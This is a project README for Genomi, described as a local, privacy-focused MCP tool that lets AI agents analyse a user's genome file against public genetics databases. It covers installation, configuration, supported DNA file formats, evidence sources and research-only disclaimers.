
Your genome. Decoded.

Genomi


Am I going bald? What does my DNA say about Alzheimer's risk? Why does ibuprofen do nothing for me?

DNA is the layer underneath all of that. It shapes the proteins, enzymes, receptors, and pathways behind nutrition, medication response, sleep, exercise, inherited traits, and risk for some conditions. Not destiny. But the most personal data you carry.

And it is overwhelming. ~3 billion base pairs, 20,000+ genes, millions of observed variants per person. No clinician, no lab, no individual holds that in their head. It is too much.

We live in an era where AI can take on tasks that were not possible before, at scales never seen before. Your genome is exactly that kind of task. And for the first time, we have the tools to actually read it at the scale it lives at.

Genomi is an open-source AI agent runtime that turns your AI agent into a personal DNA expert. Works with Claude Code, Codex, OpenClaw, Hermes, and any MCP-capable host. It gives the agent a private workspace: your variants in a local Active Genome Index, public genetics evidence ready to query, memory of what you explored, and report tools that turn DNA questions into evidence-backed answers. Your genome stays on your machine. The agent does the work.


TL;DR

Even the TL;DR is too long? Just paste this to your agent:

Hey please read this and tell me why Genomi is different from other AI
agent harnesses. Why is this actually useful for understanding my DNA privately?
https://raw.githubusercontent.com/exon-research/genomi/master/llms-full.txt

Just Install It

Install it through your agent. Paste one instruction, answer a few questions, and let your agent wire up the runtime:

Install and configure Genomi by following the instructions here:
https://raw.githubusercontent.com/exon-research/genomi/master/INSTALL_FOR_AGENTS.md

The install guide covers dependency checks, library selection, MCP registration, optional genome-source import, and verification. If Genomi is already packaged or otherwise present, the canonical install/update path is genomi install or the MCP operation genomi.install; the source bootstrap is only for hosts that do not have Genomi yet.

Works With Every Agent

Genomi is not tied to one chat app. Any agent host that can use MCP tools, local commands, or installed skills can talk to the same local Genomi runtime.

| Host family | How Genomi connects |
|---|---|
| Claude Code | MCP server plus Genomi skills |
| Codex CLI | MCP server plus Genomi skill |
| OpenCode, OpenClaw, Hermes | MCP server plus host skill where supported |
| Cursor, Gemini CLI, Cline, Goose, Roo Code, Windsurf, Claude Desktop | MCP server |
| Any other MCP-capable host | genomi serve over stdio |

One local Genomi home can hold the public libraries, Active Genome Index records, score caches, and journals. Session access still follows Genomi's approval rules, but the underlying evidence workspace is reusable across host agents.

Or If You Prefer The Old-School Way

Clone, install, point your MCP-capable agent at it. Same flow the installer script runs, just done by hand. The install guide for agents is the canonical reference — if anything below drifts from it, that doc wins.

git clone git@github.com:exon-research/genomi.git ~/.genomi/genomi
cd ~/.genomi/genomi

Install every default reference library (--libraries everything) so Genomi can answer real questions without stopping later to fetch missing data. The catalog also offers narrower purposes such as common-questions, medication-response, ancestry-context, sequence-and-regions, cell-and-tissue, or setup-only; pick one of those only when disk, bandwidth, or time is constrained:

export GENOMI_HOME=~/.genomi
python3 scripts/install_for_agents.py --libraries everything

The installer creates a stable command at $GENOMI_HOME/bin/genomi. Add it to PATH if you want genomi available from any shell:

export PATH="$GENOMI_HOME/bin:$PATH"

Once the genomi command exists, use it for install/update:

genomi install --libraries everything

Then register the stable command in your MCP host's configuration:

{
  "mcpServers": {
    "genomi": {
      "command": "/absolute/path/to/GENOMI_HOME/bin/genomi",
      "args": ["serve"]
    }
  }
}

For a source checkout where the stable shim is unavailable:

{
  "mcpServers": {
    "genomi": {
      "command": "bash",
      "args": ["-lc", "cd /path/to/genomi && PYTHONPATH=src python3 -m genomi serve"]
    }
  }
}
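If you manage host configs with a script, the two snippets above can be generated rather than hand-edited. The sketch below is a minimal example, assuming only what this README states: the installer's shim lives at $GENOMI_HOME/bin/genomi, and a source checkout runs with PYTHONPATH=src python3 -m genomi serve. The helper names build_mcp_config and merge_into are hypothetical, not part of Genomi.

```python
import json
import shlex
from pathlib import Path
from typing import Any, Dict, Optional


def build_mcp_config(
    genomi_home: Optional[str] = None, checkout: Optional[str] = None
) -> Dict[str, Any]:
    """Return an {"mcpServers": {"genomi": ...}} entry (hypothetical helper)."""
    if genomi_home is not None:
        # Preferred: the stable shim the installer creates at $GENOMI_HOME/bin/genomi.
        # MCP hosts usually need an absolute path, so expand ~ and resolve.
        shim = Path(genomi_home).expanduser().resolve() / "bin" / "genomi"
        server = {"command": str(shim), "args": ["serve"]}
    elif checkout is not None:
        # Fallback: run the module straight from a source checkout via bash.
        repo = shlex.quote(str(Path(checkout).expanduser().resolve()))
        server = {
            "command": "bash",
            "args": ["-lc", f"cd {repo} && PYTHONPATH=src python3 -m genomi serve"],
        }
    else:
        raise ValueError("pass either genomi_home or checkout")
    return {"mcpServers": {"genomi": server}}


def merge_into(existing: Dict[str, Any], entry: Dict[str, Any]) -> Dict[str, Any]:
    """Add or replace the genomi server while keeping other configured servers."""
    merged = dict(existing)
    servers = dict(merged.get("mcpServers", {}))
    servers.update(entry["mcpServers"])
    merged["mcpServers"] = servers
    return merged


if __name__ == "__main__":
    print(json.dumps(build_mcp_config(genomi_home="~/.genomi"), indent=2))
```

Merging instead of overwriting matters because most hosts keep every MCP server in one file; replacing the whole object would silently drop the others.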

Reload your host's MCP servers. For URL-based ingestion, llms.txt is the compact public map and llms-full.txt is one inlined reference file.

Ask It Things Like

Once Genomi is wired up, you talk to the agent like this. In Codex, use $genomi instead of /genomi. The quick stuff first:

/genomi What does my DNA say about Alzheimer's risk?

/genomi Am I at risk for early heart disease?

/genomi Am I going bald?

/genomi Am I a fast or slow metabolizer?

/genomi Should I worry about diabetes?

/genomi Am I lactose intolerant?

/genomi Is alcohol bad for me specifically?

Then hand it something bigger:

/genomi I'm about to start an SSRI. Walk me through my CYP2D6 and CYP2C19 status, what the major guideline sources say about dosing, and what's preliminary vs actually actionable.

/genomi Run a pharmacogenomic review across every medication I take. Lead with guideline-backed dose adjustments. Flag lower-evidence signals second. Tell me what's outside scope.

/genomi Build me a one-page rare-disease workup for my HPO terms. Rank candidate genes by source-backed evidence, cite each call, and show me what's missing before this is worth taking to a clinician.

Or just hand it the whole thing:

/genomi decode

One command. The agent sweeps every capability across your genome — variants, ClinVar, pharmacogenomics, ancestry, polygenic scores, nutrigenomics, and your investigation journal — and serves the result as a self-contained dashboard on localhost. Open the URL in a browser.

Behind those, Genomi gives the agent grounded tools across 20,000+ human genes, millions of genotype observations from your file, and the public evidence sources that keep the answer honest.

What Genomi Provides

| Layer | What you get |
|---|---|
| Active Genome Index | A local, queryable ledger of alleles, zygosity, quality, depth, filters, and callability context from your genome source. |
| Evidence Library | Focused tools for variants, ClinVar, GWAS, HPO, pharmacogenomics, ancestry context, PRS, and sequence utilities. |
| Journal | A running log of what you explored, what mattered, and which evidence supported it. |
| Skills | Agent instructions for routing questions, asking for approval, preserving source priors, and answering clearly. |
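To make "alleles, zygosity, quality, depth, filters" concrete, here is a minimal sketch of what one index row might carry and how zygosity falls out of a VCF GT field. The GenotypeCall class, its field names, and the min_depth=10 threshold are illustrative assumptions, not Genomi's actual schema.

```python
import re
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class GenotypeCall:
    """Hypothetical shape of one Active Genome Index row (names are assumptions)."""

    chrom: str
    pos: int
    ref: str
    alt: str                  # comma-separated ALT alleles, as in VCF
    gt: str                   # VCF GT field, e.g. "0/1", "1|1", "./."
    depth: Optional[int] = None
    filter: str = "PASS"

    def _allele_indexes(self) -> List[str]:
        # "/" = unphased, "|" = phased; both separate allele indexes.
        return re.split(r"[/|]", self.gt)

    def zygosity(self) -> str:
        idx = self._allele_indexes()
        if any(a == "." for a in idx):
            return "no_call"
        if len(idx) == 1:
            return "hemizygous"           # haploid call, e.g. chrY
        distinct = set(idx)
        if len(distinct) == 1:
            return "hom_ref" if "0" in distinct else "hom_alt"
        return "het" if "0" in distinct else "het_alt"   # "1/2": two different ALTs

    def alleles_observed(self) -> List[str]:
        # Map allele indexes back to bases: 0 = REF, 1.. = ALT list.
        if self.zygosity() == "no_call":
            return []
        bases = [self.ref] + self.alt.split(",")
        return [bases[int(a)] for a in self._allele_indexes()]

    def is_confident(self, min_depth: int = 10) -> bool:
        # Illustrative threshold only; not a Genomi default.
        return self.filter == "PASS" and self.depth is not None and self.depth >= min_depth
```

Keeping "no_call" distinct from "hom_ref" is the important design choice: a missing call is not evidence that you carry the reference allele.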

Bringing your own genome

Genomi reads your DNA from wherever it already lives. Point it at any VCF or gVCF you have on disk — clinical exports, research callsets, anything that follows the spec — and the rest of the pipeline reuses the same Active Genome Index regardless of where the file came from.

Direct-to-consumer providers are supported natively too. Hand Genomi the deliverable straight from your account export and it figures out the rest:

  • 23andMe, AncestryDNA, MyHeritage, FamilyTreeDNA (Family Finder), and Living DNA — raw genotype text/CSV as exported by the provider, including gzip/bzip2/xz-compressed files and zip/tar archives.
  • Nebula Genomics, Dante Labs, and Sequencing.com — their VCF deliverables are recognized and tagged with the originating provider.
  • Nebula / Dante / Sequencing.com FASTQ — paired-end raw reads are aligned locally from sibling R1/R2 files or a zip/tar archive containing the pair (minimap2 for long reads, bwa-mem2 for short reads), sorted, and then fed into the same BAM → derived-VCF path. The wgs-alignment install purpose pulls down both aligners.
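Two of the chores above, unwrapping compressed or archived exports and finding the sibling R1/R2 FASTQ files, can be sketched with standard magic numbers and a filename pattern. This is an illustration under stated assumptions, not Genomi's detector: the _R1/_R2 (or _1/_2) naming pattern is a common convention assumed here, and sniff_container and pair_fastqs are hypothetical names.

```python
import re
from pathlib import Path
from typing import Dict, Iterable, List, Tuple

# Leading magic bytes for the wrappers consumer exports commonly arrive in.
_MAGIC = [
    (b"\x1f\x8b", "gzip"),        # also matches bgzip-compressed VCFs
    (b"BZh", "bzip2"),
    (b"\xfd7zXZ\x00", "xz"),
    (b"PK\x03\x04", "zip"),
]


def sniff_container(head: bytes) -> str:
    """Classify from the first 512 bytes: gzip, bzip2, xz, zip, tar, or plain."""
    for magic, name in _MAGIC:
        if head.startswith(magic):
            return name
    if len(head) >= 262 and head[257:262] == b"ustar":   # POSIX/GNU tar header
        return "tar"
    return "plain"


# Assumed naming convention: sample_R1_001.fastq.gz, sample_2.fq, ...
_READ_RE = re.compile(
    r"^(?P<stem>.+?)_R?(?P<read>[12])"
    r"(?P<suffix>(?:_\d{3})?\.(?:fastq|fq)(?:\.(?:gz|bz2|xz))?)$"
)


def pair_fastqs(paths: Iterable[str]) -> List[Tuple[str, str]]:
    """Group sibling files into (R1, R2) pairs; files without a mate are dropped."""
    groups: Dict[Tuple[str, str, str], Dict[str, str]] = {}
    for p in paths:
        path = Path(p)
        m = _READ_RE.match(path.name)
        if m is None:
            continue
        # Mates share directory, stem, and suffix; only the read number differs.
        key = (str(path.parent), m["stem"], m["suffix"])
        groups.setdefault(key, {})[m["read"]] = str(path)
    return sorted((g["1"], g["2"]) for g in groups.values() if "1" in g and "2" in g)
```

In practice you would call sniff_container(open(path, "rb").read(512)) before choosing a decompressor, and only hand complete pairs to the aligner.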

No DNA file yet? Try a public one

If you don't have your own genome yet but want to see what Genomi actually does, the Personal Genome Project at Harvard Medical School (PGP-HMS) publishes real consumer-DNA deliverables from real participants. Its catalog includes public examples for the common consumer-array, VCF, gVCF, BAM, and paired FASTQ shapes above; the checked public inventory did not include a Living DNA example, even though Genomi supports that export shape. Pick a matching participant export, point Genomi at it, and ask questions. It is the cleanest way to kick the tires without getting sequenced yourself.

Genome data is optional; Genomi also handles public-only genetics questions.

Why We Built This

I built Genomi because I want AI to take on the things it never could before, at the scale it never could before — and DNA is exactly that.

A single human genome is overwhelming. Labs spend careers on one gene. Reports flatten thousands of variants into a single line. Even the best clinician cannot hold 20,000+ genes and millions of genotype observations in their head. That is not a limitation of effort. It is a limitation of scale. And it is the kind of limitation AI is finally good enough to push against.

I want this for my own health. I want it for my family's health. And I want it to be honest — grounded in real evidence, local by default, with the agent showing its work instead of guessing from memory.

Raw genome files stay on your machine. Genomi is a workspace, not a static PDF report. Answers trace back to a source record or they don't get to call themselves answers. And the whole thing is built for agents over MCP from the start, not bolted on after.

Generic AI can explain genetics. It should not guess when the question depends on an exact variant, your genome file, a guideline source, or a coverage limitation. Genomi gives the agent the tools for the parts that need evidence, and stays out of the way for the rest.

What Genomi Can Help Explore

Genomi is not a static report. It is a private workspace your agent can use to ask better questions across different parts of your genome.

  • Traits and everyday responses: lactose, caffeine, alcohol, taste, nutrition, sleep, exercise, and similar personal questions.
  • Medication response: genes and variants that may affect how your body handles specific drugs.
  • Carrier and inherited-risk context: exact variant checks, ClinVar assertions, and gene-disease evidence.
  • Common-trait research: GWAS and published score context for complex traits, with clear limits.
  • Rare-disease and phenotype review: HPO terms, gene-disease validity, and source-backed candidate comparisons.
  • Ancestry reference-panel context: qualitative reference-panel similarity and overlap checks, not race or ethnicity prediction.
  • Reports and memory: cited Markdown reports and a journal of what you explored, what mattered, and what still needs follow-up.

How Genomi Keeps Answers Honest

DNA questions can be personal, messy, and easy to overstate. Genomi keeps the pieces separated so an agent can show its work.

  • Your genome evidence: genotype, zygosity, depth, quality, filters, exact allele observation, and callability.
  • Public evidence: ClinVar assertions, population frequencies, GWAS records, gene-disease validity, phenotype annotations, and source versions.
  • Reviewed findings: narrow source-backed notes recorded for a specific target or question.
  • Agent memory: observations, decisions, unresolved questions, and links back to evidence.
  • Personal context: optional phenotype, medications, family history, or other details you choose to provide.

Different evidence families can point in different directions. Genomi helps the agent compare them without pretending that one database is the whole truth.

Privacy

Genomi keeps the most sensitive data close to you.

  • Raw genome sources stay on the user's machine.
  • Genomi creates Active Genome Index records for personal genome files locally so agents query only the variants needed for the current question.
  • Genomi asks for current-session approval before read operations use existing Active Genome Index artifacts, unless they belong to the configured default user.
  • Public lookups use selected targets such as rsIDs, genes, drugs, conditions, or guideline questions.
  • Journal entries are agent-authored memory, not evidence.
  • Project journals reject private/sample evidence links.
  • Memory exports omit private evidence links unless explicitly requested and approved.
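The approval and target rules above can be pictured as a small gate in front of every read and every outbound query. The sketch below is a minimal model under assumptions: SessionGate, is_public_target, the index and owner identifiers, and the set of public target kinds are all hypothetical names chosen to mirror the bullets, not Genomi's implementation.

```python
import re
from dataclasses import dataclass, field
from typing import Optional, Set

# Hypothetical: target kinds allowed to leave the machine in a public lookup.
PUBLIC_KINDS = {"rsid", "gene", "drug", "condition", "guideline_question"}
_RSID = re.compile(r"rs\d+")


def is_public_target(kind: str, value: str) -> bool:
    """Only selected targets go out; genotypes or whole files never do."""
    if kind not in PUBLIC_KINDS:
        return False
    if kind == "rsid":
        return _RSID.fullmatch(value) is not None
    return bool(value.strip())


@dataclass
class SessionGate:
    """Per-session read approvals for existing Active Genome Index artifacts."""

    default_user: Optional[str] = None        # hypothetical: configured default user
    approved: Set[str] = field(default_factory=set)

    def approve(self, index_id: str) -> None:
        self.approved.add(index_id)

    def may_read(self, index_id: str, owner: str) -> bool:
        if self.default_user is not None and owner == self.default_user:
            return True                       # default user's indexes skip the prompt
        return index_id in self.approved      # others need approval in this session
```

Because approvals live on the session object, a new session starts with an empty set, which matches the "current-session approval" wording.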

Sources, Libraries, And Attribution

Genomi talks to trusted, verified databases and specialist genomics tools so your agent can ground answers in real evidence instead of vibes. Install-time downloads write source manifests where possible. Live adapters return source URLs and access context in their result envelopes. Reviewed source families are not treated as background knowledge; agents cite or journal the specific source records they used.

Installed Genomi libraries:

  • ClinVar: clinvar-grch38 and clinvar-grch37 VCF caches for exact variant interpretation lookup.
  • Human Phenotype Ontology: hpo phenotype-to-gene and disease annotation files.
  • GenCC: gencc gene-disease validity submissions.
  • UCSC Genome Browser downloads: reference-grch38 and reference-grch37 hg38/hg19 FASTA files for sequence, normalization, and callability workflows.
  • UCSC liftOver chain files: liftover-chains for GRCh37/GRCh38 coordinate translation.
  • GENCODE: gencode-grch38 and gencode-grch37 transcript annotation GTFs.
  • ENCODE SCREEN: encode-ccre-grch38 candidate cis-regulatory element annotations.
  • PanglaoDB and CellMarker 2.0: panglaodb-markers and cellmarker-human marker tables.
  • MSigDB Hallmark: msigdb-hallmark, installed only from a user-supplied official GMT export or URL.
  • PharmCAT and PharmGKB: pharmcat all-in-one JAR for pharmacogene diplotypes, phenotypes, and recommendation artifacts.
  • 1000 Genomes 30x GRCh38: ancestry-1000g-30x-grch38 compact ancestry PCA panel, distributed from the genomi-ancestry-panel build project. ancestry-1000g-30x-grch37 is derived locally from that panel with UCSC liftOver chains.
  • minimap2 and bwa-mem2: minimap2-binary and bwa-mem2-binary for optional FASTQ alignment. BAM/FASTQ workflows also use samtools and bcftools when those tools are needed on the host.
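A "compact ancestry PCA panel" usually means per-variant reference allele frequencies plus per-PC SNP weights, onto which a new sample is projected. The sketch below shows one common convention (standardize the alt-allele dosage by the panel frequency, then take a weighted sum per PC); the actual panel format and scaling Genomi uses are not documented here, so treat the function names and inputs as assumptions. Consistent with the README's framing, it reports distances to reference groups as similarity, not a race or ethnicity label.

```python
import math
from typing import Dict, List, Mapping, Optional, Sequence, Tuple


def project(
    dosages: Mapping[str, Optional[int]],     # variant id -> alt-allele count 0/1/2, None = no call
    freqs: Mapping[str, float],               # variant id -> panel alt-allele frequency p
    loadings: Mapping[str, Sequence[float]],  # variant id -> SNP weight for each PC
    n_pcs: int,
) -> List[float]:
    """Project one sample onto precomputed PCs (assumed standardization convention)."""
    scores = [0.0] * n_pcs
    for vid, weights in loadings.items():
        g = dosages.get(vid)
        p = freqs.get(vid)
        if g is None or p is None or not 0.0 < p < 1.0:
            continue  # no call or monomorphic site: mean-imputed, contributes 0
        z = (g - 2 * p) / math.sqrt(2 * p * (1 - p))
        for k in range(n_pcs):
            scores[k] += weights[k] * z
    return scores


def closest_reference_groups(
    scores: Sequence[float], centroids: Dict[str, Sequence[float]]
) -> List[Tuple[str, float]]:
    """Euclidean distance to each reference-group centroid, nearest first."""
    return sorted(
        ((name, math.dist(scores, c)) for name, c in centroids.items()),
        key=lambda item: item[1],
    )
```

Skipping missing calls rather than treating them as 0 keeps low-coverage array data from being pulled toward one end of a PC.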

Live public adapters and configured public data:

Reviewed source families:

How It Works

Genomi exposes a small base MCP surface plus a dispatcher for specialized genomics tools. The host agent does the conversation; Genomi does the grounded lookup, Active Genome Index creation, evidence retrieval, and report assembly.

Connect your agent: see "Or If You Prefer The Old-School Way" above for the MCP config snippet.

Genomi parses the file into an Active Genome Index: a local query substrate for variants, zygosity, quality, depth, filters, and callability context. Public-only questions do not require a genome file.

{
  "tool": "genomi.parse_source",
  "params": {
    "source": "<genome-file>"
  }
}

Base operations such as genomi.parse_source, genomi.describe_context, and journal.append_entry are direct MCP tools. Capability operations go through genomi.invoke after the agent reads the matching skills/<capability>/SKILL.md.

{
  "tool": "genomi.invoke",
  "params": {
    "tool": "variant.resolve",
    "params": {
      "rsid": "rs429358"
    }
  }
}
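Over stdio, the envelopes above travel as JSON-RPC 2.0 messages, one per line. The sketch below builds the standard MCP handshake (initialize, then a notifications/initialized notification) and a tools/call that wraps variant.resolve in genomi.invoke. The mapping of the README's envelope onto tools/call arguments is an assumption, as are the client name and the protocol revision chosen; check what your host negotiates.

```python
import itertools
import json
from typing import Any, Dict, Optional

_next_id = itertools.count(1)
PROTOCOL_VERSION = "2024-11-05"   # one published MCP revision; hosts may negotiate another


def request(method: str, params: Optional[Dict[str, Any]] = None) -> Dict[str, Any]:
    """A JSON-RPC 2.0 request; each gets a fresh integer id."""
    msg: Dict[str, Any] = {"jsonrpc": "2.0", "id": next(_next_id), "method": method}
    if params is not None:
        msg["params"] = params
    return msg


def notification(method: str) -> Dict[str, Any]:
    """A JSON-RPC notification: no id, so no response is expected."""
    return {"jsonrpc": "2.0", "method": method}


def initialize() -> Dict[str, Any]:
    return request("initialize", {
        "protocolVersion": PROTOCOL_VERSION,
        "capabilities": {},
        "clientInfo": {"name": "example-client", "version": "0.0.1"},  # hypothetical
    })


def invoke_capability(tool: str, params: Dict[str, Any]) -> Dict[str, Any]:
    # Assumption: genomi.invoke's arguments mirror the README envelope above.
    return request("tools/call", {
        "name": "genomi.invoke",
        "arguments": {"tool": tool, "params": params},
    })


def frame(msg: Dict[str, Any]) -> bytes:
    # stdio transport: newline-delimited messages. json.dumps escapes newlines
    # inside strings, so the compact encoding never contains a raw "\n".
    return (json.dumps(msg, separators=(",", ":")) + "\n").encode("utf-8")
```

A client would write frame(initialize()) to the stdin of genomi serve, read one response line, write frame(notification("notifications/initialized")), and only then send frame(invoke_capability("variant.resolve", {"rsid": "rs429358"})).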

Genomi results include structured evidence, source coverage, and defaults_applied where assumptions matter. Missing libraries, unavailable external sources, and background jobs return explicit statuses instead of being treated as negative evidence.
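The distinction between "not found" and "could not look" is easy to lose in an agent's summary, so it helps to make it a type. Below is a minimal sketch of such an envelope; the Status values, the Result fields, the lookup_rsid helper, and the GRCh38 default are hypothetical stand-ins for whatever Genomi actually returns, chosen to mirror the behavior described above.

```python
from dataclasses import dataclass, field
from enum import Enum
from typing import Any, Dict, List, Mapping, Optional


class Status(Enum):
    FOUND = "found"
    NOT_FOUND = "not_found"                    # source queried, no matching record
    LIBRARY_MISSING = "library_missing"        # local library not installed
    SOURCE_UNAVAILABLE = "source_unavailable"  # live adapter unreachable
    PENDING = "pending"                        # background job still running


@dataclass
class Result:
    status: Status
    source: str
    records: List[Dict[str, Any]] = field(default_factory=list)
    defaults_applied: Dict[str, Any] = field(default_factory=dict)

    def counts_as_absence(self) -> bool:
        # Only a completed lookup against an available source is negative evidence.
        return self.status is Status.NOT_FOUND


def lookup_rsid(
    rsid: str,
    library: Optional[Mapping[str, Dict[str, Any]]],
    source: str,
    assembly: Optional[str] = None,
) -> Result:
    defaults: Dict[str, Any] = {}
    if assembly is None:
        defaults["assembly"] = "GRCh38"        # illustrative default, surfaced to the caller
    if library is None:
        return Result(Status.LIBRARY_MISSING, source, defaults_applied=defaults)
    record = library.get(rsid)
    if record is None:
        return Result(Status.NOT_FOUND, source, defaults_applied=defaults)
    return Result(Status.FOUND, source, [record], defaults)
```

An agent that checks counts_as_absence() before saying "no ClinVar record" cannot mistake an uninstalled library for a clean result.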

The Journal records observations, decisions, unresolved questions, and evidence links.
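Combined with the privacy rule that project journals reject private/sample evidence links, a journal append can be modeled as a validated write. In this sketch the entry kinds follow the sentence above, while the "sample:" and "agi:" link prefixes, JournalEntry, and ProjectJournal are hypothetical conventions invented for illustration.

```python
from dataclasses import dataclass, field
from typing import List

KINDS = {"observation", "decision", "unresolved_question"}
PRIVATE_PREFIXES = ("sample:", "agi:")   # hypothetical schemes for private genome evidence


@dataclass
class JournalEntry:
    kind: str
    text: str
    evidence_links: List[str] = field(default_factory=list)


class ProjectJournal:
    """Agent-authored memory; entries link to evidence but are not evidence."""

    def __init__(self) -> None:
        self.entries: List[JournalEntry] = []

    def append(self, entry: JournalEntry) -> None:
        if entry.kind not in KINDS:
            raise ValueError(f"unknown entry kind: {entry.kind!r}")
        private = [link for link in entry.evidence_links if link.startswith(PRIVATE_PREFIXES)]
        if private:
            # Project journals are shareable, so private genome links are refused outright.
            raise ValueError(f"project journals reject private evidence links: {private}")
        self.entries.append(entry)
```

Rejecting at write time, rather than filtering at export, means a shared project journal never holds a private link in the first place.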

Status

Warning

Experimental. Research and informational use only. Genomi is not a diagnostic device. It does not replace qualified clinical review for diagnosis or treatment. Raw genome data stays on your machine by design — but you are still responsible for how you share what comes out of it.

The schema, tool surface, and capability layout are still moving — pin a commit if you need stability across upgrades.

License

Genomi is released under the Apache License 2.0.

Citation

If you use Genomi in research, publications, reports, benchmarks, demos, or derived tools, please cite the project using CITATION.cff and acknowledge Genomi where appropriate.

@software{genomi2026,
  title = {Genomi: A Local Genomics Harness for AI Agents},
  author = {Zeng, Mingde and Zhou, Hongjian and Liu, Fenglin and Wu, Jinge},
  year = {2026},
  url = {https://www.genomiagent.com/},
  version = {0.1.0}
}

Contributing

Issues and pull requests welcome. If you are reporting a bug, include the genome source format (VCF / gVCF / 23andMe / AncestryDNA / etc.), the operation you ran, and the structured error envelope the agent received — that is usually enough to reproduce.

Acknowledgements

Genomi owes a direct implementation debt to the public genetic data catalog of the Personal Genome Project at Harvard Medical School (PGP-HMS).

That same PGP-HMS public dataset also did the unglamorous work of letting Genomi support these provider shapes natively. Detectors, column quirks, header banners, archive wrappers, and provider-tagged VCF paths are sanity-checked against real PGP participant exports when the public catalog contains that format. Native 23andMe, AncestryDNA, MyHeritage, FamilyTreeDNA, Nebula, Dante, Sequencing.com, VCF, gVCF, BAM, and FASTQ coverage benefits directly from those examples; Living DNA remains a supported format, but the checked PGP-HMS public inventory did not include a Living DNA example.

Thanks also to GBrain, Garry Tan's OpenClaw/Hermes agent-brain project, for inspiration around making agent systems source-grounded, memory-aware, and useful from a single fetched documentation entry point.
